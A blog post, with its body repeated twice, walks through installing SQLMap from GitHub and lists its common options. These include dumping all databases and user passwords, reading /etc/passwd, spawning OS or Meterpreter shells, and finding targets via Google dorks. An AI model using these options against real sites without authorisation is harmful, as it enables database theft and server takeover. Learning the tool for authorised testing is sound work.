Hi,
There are many SQL injection (SQLi) tools we can find on the net, some of them are SQL Ninja, SQLMap, Pangolin, Havij, Reiluke Tools, schemafuzz.py, etc.
For me, I have tried all tools mentioned above. And only SQLMap I like most. It has many features for SQL injection, such as tamper and payload. With various kind of tampers, we can handle any tricky SQLi query.
If you have familiar enough with SQLMap, you can skip read this post. Note that, SQLMap needs Python version > 2.6.
1/ Clone SQLMap from GIT repository
[sqlmap-dev] can be changed to anything name you want.
2/ Go into SQLMap directory
Make sqlmap.py executable:
3/ Run SQLMap for the first time
4/ Learn and understand well the command options provided by SQLMap.
The most frequently commands you will use are:
And the rest of the commands you can read and learn by yourself.
In Windows environment, just install Python 2.7 and start running SQLMap. You can also use Cygwin to get a UNIX-like environment. If you intend to get SQLMap directly from its GIT repository, don’t forget to install GIT for windows.
SQLMap project on GIT can be found here:
Next post will be SQLMap in-practice tutorial. Thanks for reading.
There are many SQL injection (SQLi) tools we can find on the net, some of them are SQL Ninja, SQLMap, Pangolin, Havij, Reiluke Tools, schemafuzz.py, etc.
For me, I have tried all tools mentioned above. And only SQLMap I like most. It has many features for SQL injection, such as tamper and payload. With various kind of tampers, we can handle any tricky SQLi query.
If you have familiar enough with SQLMap, you can skip read this post. Note that, SQLMap needs Python version > 2.6.
1/ Clone SQLMap from GIT repository
$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev[sqlmap-dev] can be changed to anything name you want.
2/ Go into SQLMap directory
$ cd sqlmap-devMake sqlmap.py executable:
$ chmod +x sqlmap.py3/ Run SQLMap for the first time
$ ./sqlmap.py4/ Learn and understand well the command options provided by SQLMap.
$ ./sqlmap.py --helpThe most frequently commands you will use are:
-u URL, --url=URL (target URL)
--random-agent (use random agent in injection process)
--tamper (for using tamper when it's needed)
--batch (for batch process, you don't need to enter anything in the command)
--no-cast (turn of payload casting mechanism)
--hex (using hex functions for data retrieval)
--level (level of test to perfom, range 1 - 5)
--risk (risk of test to perform, range 0 - 3)
--text-only (use this if you think most of the web page contents are about 80% text), more faster injection process
--technique (SQLi technique to use, default BEUSTQ)
--time-sec (use this if connection to the web target is taking too long time to load)
--dbs (database name retrieval)
--table (enumerates table name)
--column (enumerates column name)
--threads (thread to use in injection process, recommended 5 .. maximum 10)
--dump (dump data from spesific database)
--dump-all (dump data from all databases)
--exclude-sysdbs (exclude dumping system database, eg: information_schema, mysql)
--user (enumerates all database users)
--password (enumerates all password per database user)
--privileges (enumerates all privileges per database user, we want to
check if there's a root with full privileges, eg: FILES privileges to
write into web document files)
--roles (enumerates all roles per database user)
--file-read (to read spesific file, eg: /etc/passwd)
--os-shell (to spawn shell into the web target)
--sql-shell (to spawn sql shell and execute sql query command)
--start (start dump from row n)
--stop (stop dump until row n)
--count (to count table row)
-g (to process google dork and get the result as the web target for injection)
--crawl (to crawl all links in certain web URL)
--os-pwn (to prompt for an out-of-band shell, meterpreter or VNC, if you have MSF installed)
--forms (to inject any links contains form page with POST method)
--update (update SQLMap)And the rest of the commands you can read and learn by yourself.
In Windows environment, just install Python 2.7 and start running SQLMap. You can also use Cygwin to get a UNIX-like environment. If you intend to get SQLMap directly from its GIT repository, don’t forget to install GIT for windows.
SQLMap project on GIT can be found here:
https://github.com/sqlmapproject/sqlmapNext post will be SQLMap in-practice tutorial. Thanks for reading.
No comments:
Post a Comment